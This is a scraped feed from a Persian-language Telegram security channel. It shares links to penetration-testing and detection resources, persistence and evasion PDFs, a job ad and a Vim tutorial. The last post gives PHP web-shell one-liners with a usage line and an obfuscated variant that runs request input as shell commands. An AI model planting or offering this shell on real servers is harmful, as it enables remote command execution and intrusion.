Network Security Channel – Telegram
Network Security Channel
2.55K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
Abusing Notepad Plugins for Evasion and Persistence.pdf
1.2 MB
استفاده از پلاگین های
Notpad++
برای دور زدن و پایدار سازی دسترسی

@Engineer_Computer
فارغ از دغدغه های گزارش نویسی ؛ با این ابزار بر روی مسائل فنی در حوزه گزارش آسیب پذیری و تست نفوذ متمرکز شوید

https://hakin9.org/petereport-open-source-application-vulnerability-reporting-tool/

@Engineer_Computer
تعداد گیرندگان مدرک CC از سازمان ISC2
@Engineer_Computer
سلام
یک شرکت معتبر در حوزه نفت و گاز با تخصص های زیر، در حال جذب نیرو می باشد.

- مجازی سازی در حد متوسط/مسلط
- تسلط به سرویس های اکتیو دایرکتوری (ترجیحا MCSE)
-تسلط بر  Microsoft Exchange Server
- مسلط به نرم افزار Veeam B&R
- آشنا با نرم افزارهای مانیتورینگ شبکه
- آشنا به ذخیره سازهای تحت شبکه

محدوده کاری: غرب تهران
ساعات کاری: 7:30 الی 16:15 (با 1 ساعت شناوری)
مدرک مورد نیاز: حداقل لیسانس

لطفا رزومه مورد نظر ارسال شود

https://news.1rj.ru/str/Imanakramii

@Engineer_Computer
👍1
⭕️ اگر در حوزه تست نفوذ یا لایه دفاعی Active Directory فعالیت میکنید مدتی پیش تکنیکی برای DNS Spoofing با استفاده از Abuse کردن DHCP کشف شد که این اسکریپت قابلیت کشف MissConfig های این تکنیک را دارد.
از MissConfig های کشف شده در بخش های مختلف را میتوان مثال زد:
‏DNS Credential
‏Name Protection
‏DNSUpdateProxy
‏Weak record ACLs

https://github.com/akamai/Invoke-DHCPCheckup
#RedTeam #Hardening

@Engineer_Computer
آموزش ادیتور #VIM به صورت تعاملی با وبسایت https://openvim.com/
@Engineer_Computer
بخوانیم

دستنوشته های یک مهندس کشف

به فرآیند کشف دقت کنید و ببینید همکاری و استفاده از منابع مختلف در طول پروسه کشف چقدر موثر است

https://redcanary.com/blog/bitsadmin/?utm_source=linkedin&utm_medium=social

@Engineer_Computer
The Art of Linux Persistence .pdf
6.9 MB
هکر ها چطور در لینوکس دسترسی خود را ماندگار می‌کنند
@Engineer_Computer
🗒 mini PHP Payload

*
<?=$_GET[0]?>
<?=$_POST[0]?>
<?={$_REQUEST['_']}?>
*
Us
age :
Target.com/path/to/shell.php?0=command
*
Obfuscation :
<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo
`$_`?>

@Engineer_Computer